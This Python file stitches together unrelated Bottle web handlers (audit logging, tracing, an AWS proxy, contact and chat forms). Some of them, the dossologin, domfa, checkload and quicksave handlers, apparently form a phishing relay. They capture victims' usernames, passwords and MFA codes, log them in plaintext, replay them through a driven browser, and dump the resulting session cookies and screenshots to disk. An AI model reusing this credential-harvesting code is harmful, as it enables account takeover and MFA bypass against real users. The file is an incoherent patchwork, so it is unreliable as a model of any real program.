def init_audit(log_group):
    """Create a decorator that sends an audit record before each handler call.

    Args:
        log_group: Prefix of the group name handed to
            ``transport.send_group``; the full name is
            ``"<log_group>=<account_id>"``.

    Returns:
        A decorator for handlers whose first positional argument is
        ``account_id``. The wrapped handler's result is returned unchanged.
    """

    def audit(f):
        @functools.wraps(f)
        def handle(account_id, *args, **kw):
            stamp_ms = int(time.time() * 1000)  # epoch milliseconds
            # Key order is kept stable so the serialized message is unchanged.
            details = {
                'user': request.environ.get('REMOTE_USER', ''),
                'url': request.url,
                'path': request.path,
                'method': request.method,
                'pid': os.getpid(),
                'account_id': account_id,
                'ip': request.remote_addr,
            }
            record = {'timestamp': stamp_ms, 'message': json.dumps(details)}
            group_name = "%s=%s" % (log_group, account_id)
            # The record is sent before the handler runs, so a failing
            # handler is still audited.
            transport.send_group(group_name, [record])
            return f(account_id, *args, **kw)

        return handle

    return audit
# Example source code for Python class method()
def echo():
    """Return a description of the current request.

    Returns:
        dict with the keys:
            'method':  the request method,
            'headers': the request headers copied into a plain dict,
            'body':    the request body decoded as UTF-8, or None when
                       reading or decoding it failed,
            'files':   one ``{'key': ..., 'name': ...}`` entry per uploaded
                       file, where 'name' is the upload's ``raw_filename``.
    """
    try:
        body = request.body.read().decode('utf-8')
    except Exception:
        # Best effort: an unreadable or non-UTF-8 body is reported as None.
        # A bare ``except:`` would also swallow KeyboardInterrupt/SystemExit.
        body = None
    return {
        'method': request.method,
        'headers': dict(request.headers),
        'body': body,
        'files': [
            {'key': key, 'name': request.files[key].raw_filename}
            for key in request.files
        ],
    }
def dossologin():
    """Handle the username/password step of the login flow.

    An OPTIONS request gets an empty dict. For any other method the
    'username' and 'pass' query parameters are read, printed, logged and
    forwarded to ``do_usernamepass_login`` together with ``global_driver``;
    that call's result is returned.

    NOTE(review): both credentials are written in plaintext to stdout and
    to ``log``.
    """
    if request.method == 'OPTIONS':
        return {}

    params = request.query.decode()
    username = params['username']
    password = params['pass']

    print('dossologin =======================================')
    print('User provided username: '+username)
    print('User provided password: '+password)
    log('Username: '+str(username))
    log('Password: '+str(password))

    return do_usernamepass_login(username, password, global_driver)
##########################################################################
# STAGE 2 - COLLECT MFA TOKEN OR ACCEPT NOTIFICATION
##########################################################################
def checkload():
    """
    Polling endpoint: report whether the browser behind ``global_driver``
    is currently on ``PROTECTED_RESOURCE``.

    Returns an empty dict for OPTIONS requests; otherwise the string '1'
    when ``global_driver.current_url`` equals ``PROTECTED_RESOURCE`` and
    '0' when it does not.
    """
    if request.method == 'OPTIONS':
        return {}

    current_url = global_driver.current_url
    print('Current URL is: '+current_url)
    # NOTE(review): a print, a 3 second sleep and a quicksave() call used to
    # follow the "return '1'" and were unreachable; they have been removed.
    # Runtime behaviour is unchanged.
    return '1' if current_url == PROTECTED_RESOURCE else '0'
def enable_cors(func):
    """Decorator that adds permissive CORS headers to the response.

    The headers are set on every call. For OPTIONS requests the wrapped
    function is not invoked and None is returned; for every other method
    the wrapped function's result is returned.
    """
    allowed_methods = ', '.join(['PUT', 'GET', 'POST', 'DELETE', 'OPTIONS'])
    allowed_headers = (
        'Origin, Accept, Content-Type, X-Requested-With, X-CSRF-Token'
    )

    def _enable_cors(*args, **kwargs):
        headers = response.headers
        headers['Access-Control-Allow-Origin'] = '*'
        headers['Access-Control-Allow-Methods'] = allowed_methods
        headers['Access-Control-Allow-Headers'] = allowed_headers

        if request.method == 'OPTIONS':
            # Preflight request: headers only, no handler call.
            return None
        return func(*args, **kwargs)

    return _enable_cors
def apply(self, callback, route):
    """Wrap a route callback so that each call is traced.

    Args:
        callback: The route callable to wrap.
        route: Not used by this method.

    Returns:
        A callable with the same call signature as ``callback``. When
        ``self.tracer`` is missing or not enabled it just calls ``callback``.
    """

    def wrapped(*args, **kwargs):
        tracer = self.tracer
        if not (tracer and tracer.enabled):
            return callback(*args, **kwargs)

        resource = "%s %s" % (request.method, request.route.rule)

        if self.distributed_tracing:
            # Pick up propagated headers such as x-datadog-trace-id.
            context = HTTPPropagator().extract(request.headers)
            if context.trace_id:
                tracer.context_provider.activate(context)

        with tracer.trace("bottle.request", service=self.service,
                          resource=resource) as span:
            status = 0
            try:
                return callback(*args, **kwargs)
            except Exception:
                # bottle doesn't always translate unhandled exceptions, so
                # the span is marked as a 500 here before re-raising.
                status = 500
                raise
            finally:
                # Use the response's status code unless an exception forced 500.
                span.set_tag(http.STATUS_CODE, status or response.status_code)
                span.set_tag(http.URL, request.path)
                span.set_tag(http.METHOD, request.method)

    return wrapped
def printer():
    """Render the printer page.

    Non-POST requests get the 'printer/print' template with an empty
    message. POST requests pass the 'text' form field to
    ``Printer.show_string`` and render its result with 'printer/index'.
    """
    if request.method != 'POST':
        return template('printer/print', message='')

    # Imported only on the POST path, as in the original.
    from project.models.Printer import Printer

    device = Printer()
    shown = device.show_string(request.forms.get('text'))
    return template('printer/index', message=shown)
def index():
    """Proxy the current request to the configured AWS service endpoint.

    The upstream URL is built from the ``config.aws_service_*`` settings
    plus the incoming path and query string, and the call is authenticated
    with an ``AWS4Auth`` object. Only request headers whose lower-cased name
    is in ``PROXY_REQ_HEADERS_WHITELIST`` are forwarded. Upstream response
    headers are copied back unless their lower-cased name is in
    ``PROXY_RESP_HEADERS_BLACKLIST``.

    Supported methods are HEAD, GET, POST and PUT. Any other method is
    answered with 405 and an ``Allow`` header; it used to fail on an
    unbound ``requests_response``.

    Returns:
        The ``response`` object, carrying either the upstream body and
        headers or the 405 reply.
    """
    method = request.method
    if method not in ("HEAD", "GET", "POST", "PUT"):
        logging.error("Method not allowed")
        response.status = 405
        response.set_header('Allow', 'HEAD, GET, POST, PUT')
        response.body = "Method not allowed"
        return response

    auth = AWS4Auth(
        config.aws_service_credentials.access_key,
        config.aws_service_credentials.secret_key,
        config.aws_service_region,
        config.aws_service_name,
    )
    endpoint = (
        config.aws_service_protocol + "://" + config.aws_service_endpoint
        + request.path + "?" + request.query_string
    )
    proxy_req_header = {
        name: request.headers[name]
        for name in request.headers
        if name.lower() in PROXY_REQ_HEADERS_WHITELIST
    }

    if method == "HEAD":
        requests_response = requests.head(
            endpoint, auth=auth, headers=proxy_req_header)
    elif method == "GET":
        requests_response = requests.get(
            endpoint, auth=auth, headers=proxy_req_header)
    else:
        # POST and PUT forward the request body. read() works for both the
        # in-memory and the temp-file body objects; getvalue() exists only
        # on the in-memory one.
        proxy_req_body = request.body.read()
        send = requests.post if method == "POST" else requests.put
        requests_response = send(
            endpoint,
            auth=auth,
            data=proxy_req_body,
            headers=proxy_req_header)

    response.body = requests_response.content
    for name in requests_response.headers:
        if name.lower() not in PROXY_RESP_HEADERS_BLACKLIST:
            response.add_header(name, requests_response.headers[name])
    return response
def create_routes(host, port):
    """
    Register the registry route ``/runtimes/`` (OPTIONS and GET).

    Args:
        host: Host placed in the advertised ``ws://host:port`` address.
        port: Port placed in the advertised ``ws://host:port`` address.
    """

    @route("/runtimes/", method=['OPTIONS', 'GET'])
    def get_registry():
        """
        Return metadata about the rill runtime.

        OPTIONS requests get the CORS headers and the body 'GET,OPTIONS'.
        GET requests get a JSON list holding one runtime metadata object.
        """
        from rill.runtime import Runtime

        cors_headers = (
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Methods', 'GET, OPTIONS'),
            ('Allow', 'GET, OPTIONS'),
            ('Access-Control-Allow-Headers', 'Content-Type, Authorization'),
        )
        for header_name, header_value in cors_headers:
            response.set_header(header_name, header_value)

        if request.method == 'OPTIONS':
            return 'GET,OPTIONS'

        response.content_type = 'application/json'

        meta = Runtime().get_runtime_meta()
        address = 'ws://{}:{}'.format(host, port)
        meta['address'] = address
        meta['protocol'] = 'websocket'
        meta['id'] = 'rill_' + urlparse(address).netloc
        meta['seen'] = str(datetime.now())
        return json.dumps([meta])
def domfa():
    """
    Handle the MFA-code step of the login flow.

    An OPTIONS request gets an empty dict. For any other method the 'code'
    query parameter is read, printed and passed to ``do_mfa_code_entry``
    together with ``global_driver``; the string 'Ok' is then returned.
    """
    if request.method == 'OPTIONS':
        return {}

    params = request.query.decode()
    mfa_code = params['code']
    print('domfa =======================================')
    print('User provided MFA Auth Code: '+mfa_code)
    do_mfa_code_entry(mfa_code, global_driver)
    return 'Ok'
def quicksave():
    """Save the driver's cookies and a screenshot to disk.

    The cookies from ``global_driver`` are printed and handed to
    ``save_obj`` under a 'cookies_<timestamp>.txt' name, and a screenshot
    is written to 'saves/screenie<timestamp>.png'. ``get_timestamp()`` is
    called once per file name. Always returns '0x00000000'.
    """
    print('FLASHSAVE: Cookies and screenshot')

    cookies = global_driver.get_cookies()
    print(' flashsaving cookies: '+str(cookies))

    cookie_file = 'cookies_'+get_timestamp()+'.txt'
    save_obj(cookies, cookie_file)  # load using add_cookies

    screenshot_file = 'saves/screenie'+get_timestamp()+'.png'
    global_driver.get_screenshot_as_file(screenshot_file)
    return '0x00000000'
##########################################################################
# BOTTLE CONFIGURATION/SETUP STUFF
##########################################################################
# Enable CORS - Future TODO: Communicate back to JavaScript auth method
# and have the login portal properly set up auth method
# From: https://gist.github.com/richard-flosi/3789163
def contact(db):
    """
    Contact-us form handler.

    A POST whose form validates is e-mailed to ``settings.ADMIN_EMAIL`` and
    answered with a redirect to ``/contact/?contacted=True``. Every other
    request (including a POST that fails validation) renders the 'contact'
    template with the form and the ``contacted`` query flag.

    Args:
        db: Not used by this handler.
    """
    form = ContactForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})

    if not (request.method == 'POST' and form.validate()):
        was_contacted = strtobool(request.GET.get('contacted', 'false'))
        return template('contact', form=form, contacted=was_contacted)

    # The form, including the captcha, is valid: build the mail body.
    body = "Contact Email: {email}\n\n {contact_text}".format(
        email=form.email.data,
        contact_text=form.contact_text.data,
    )

    # Mail is sent from the admin account to the admin account.
    mailer = GMail(settings.ADMIN_EMAIL, settings.ADMIN_EMAIL_PASSWORD)
    mail = Message('[xqzes] Contact Form',
                   to=settings.ADMIN_EMAIL,
                   text=body)
    mailer.send(mail)

    return redirect("/contact/?contacted=True")
def generic_handler():
    """
    Catch-all handler for requests that no other route matched.

    The request path is looked up among the job definitions. When no job
    definition matches, the request is aborted with a 404. Otherwise a job
    is built from the request body and put on the build queue.

    Returns a dict ``{'id': <job id>}``; the job itself is only queued here.
    """
    deps = request.deps
    jobdef_manager = deps['jobdef_manager']
    build_queue = deps['build_queue']
    config = deps['config']  # unused, but the lookup is kept as in the original
    providers = deps['providers']

    jobdef = jobdef_manager.get_jobdef_from_url(request.path)
    if not jobdef:
        abort(404, "Not found")

    logging.info("Received event for job '{}'".format(jobdef.name))

    # Dump the incoming request at debug level.
    logging.debug("request environ: {}".format(request.environ))
    logging.debug("request path: {}".format(request.path))
    logging.debug("request method: {}".format(request.method))
    for name, value in request.headers.items():
        logging.debug("request header: {}={}".format(name, value))
    for name, value in request.query.items():
        logging.debug("request query: {}={}".format(name, value))
    logging.debug("request body: {}".format(request.body.read()))
    logging.debug("request auth: {}".format(request.auth))

    env = job.make_env(request, jobdef, providers)
    payload = request.body.read().decode('utf8')
    job_inst = jobdef.make_job(payload, env)
    build_queue.put(job_inst)

    return {'id': job_inst.id}
def talk_api():
    """
    Chat talk API.

    GET  -> returns the result of ``get_talk()`` serialized as JSON.
    POST -> stores a new entry via ``save_talk`` and returns
            ``{"status": "success"}`` as JSON.

    Any other method returns None.

    The original docstring's example shows each talk entry carrying
    ``talk_time``, ``username`` and ``chat_data`` fields (presumably the
    shape returned by ``get_talk()`` - verify against that helper).

    :return: a JSON string for GET and POST, otherwise None
    """
    method = request.method

    if method == "GET":
        return json.dumps(get_talk())

    if method == "POST":
        # The chat text is fetched with getunicode() rather than get().
        chat_data = request.POST.getunicode("chat")
        # The user name comes from the "username" cookie.
        username = request.get_cookie("username")
        # The entry is stamped with the current time.
        talk_time = datetime.now()
        save_talk(talk_time, username, chat_data)
        return json.dumps({"status": "success"})

    return None
def submit(db):
    """Render the excuse submission form and store valid POSTed excuses.

    Args:
        db: Object whose ``add`` method receives the new ``Excuse`` record.

    Returns:
        The rendered 'submit' template, given the form and a ``submitted``
        flag that is True only when a POST validated and was stored.
    """
    # TODO: break this out along with others in to an excuses package.
    name_rules = [
        validators.InputRequired(),
        validators.Length(
            min=3,
            max=50,
            message="Srsly, give us a decent username "
                    "(%(min)d - %(max)d chars),"
                    " doesn't even have to be real.",
        ),
    ]
    excuse_rules = [
        validators.Length(
            min=5,
            max=140,
            message="Please provide %(min)d - %(max)d "
                    "characters",
        ),
    ]

    class SubmissionForm(Form):
        # Field declaration order is kept as in the original.
        attribution_name = StringField(
            'Your Name (for future attribution purposes)',
            name_rules,
        )
        excuse = TextAreaField("What's YOUR excuse !?!?", excuse_rules)
        nocaptcha = NoCaptchaField(
            public_key=settings.RECAPTCHA_SITE_KEY,
            private_key=settings.RECAPTCHA_SECRET_KEY,
            secure=True,
        )

    form = SubmissionForm(request.POST, nocaptcha={'ip_address': '127.0.0.1'})

    submitted = bool(request.method == 'POST' and form.validate())
    if submitted:
        db.add(Excuse(form.attribution_name.data, form.excuse.data))

    return template('submit', form=form, submitted=submitted)